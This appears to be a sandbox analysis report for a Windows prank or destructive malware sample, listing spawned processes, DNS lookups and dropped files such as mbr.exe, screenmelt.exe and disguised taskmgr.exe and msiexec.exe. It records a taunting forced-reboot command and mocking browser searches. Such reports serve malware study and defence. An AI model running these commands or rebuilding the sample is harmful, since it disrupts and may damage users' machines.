C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=HAHAHAHAHAHA

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x10c,0x110,0x114,0xdc,0x118,0x7ffce8da3cb8,0x7ffce8da3cc8,0x7ffce8da3cd8

C:\Windows\system32\timeout.exe

timeout /t 15 /nobreak

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2020 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2588 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4892 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=russian+democratic+federative+republic

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffce8da3cb8,0x7ffce8da3cc8,0x7ffce8da3cd8

C:\Windows\system32\timeout.exe

timeout /t 15 /nobreak

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3872 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=moskau+moskau

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffce8da3cb8,0x7ffce8da3cc8,0x7ffce8da3cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1

C:\Windows\system32\shutdown.exe

shutdown /r /t 3 /c "id like to see you fix this lol"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:1

C:\Windows\System32\PickerHost.exe

C:\Windows\System32\PickerHost.exe -Embedding

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa3a3c855 /state1:0x41c64e6d

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1708 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.4.4:53 google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 4.4.8.8.in-addr.arpa udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.4.4:53 google.com udp
US 8.8.8.8:53 www.google.com udp

Files

C:\Users\Admin\Downloads\user.bmp

C:\Users\Admin\AppData\Local\Temp\6234.tmp\6235.tmp\6236.bat

C:\Users\Admin\downloads\colorcmd.exe

C:\Users\Admin\downloads\screenmelt.exe

C:\Users\Admin\downloads\mbr.exe

C:\Users\Admin\downloads\taskmgr.exe

C:\Users\Admin\downloads\mmc.exe

C:\Users\Admin\downloads\winntcus64.png

C:\Users\Admin\downloads\msiexec.exe

C:\Users\Admin\downloads\winnt64.exe

\??\PIPE\lsarpc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

C:\Users\Public\Desktop\ISEEYOU6.prsnlz
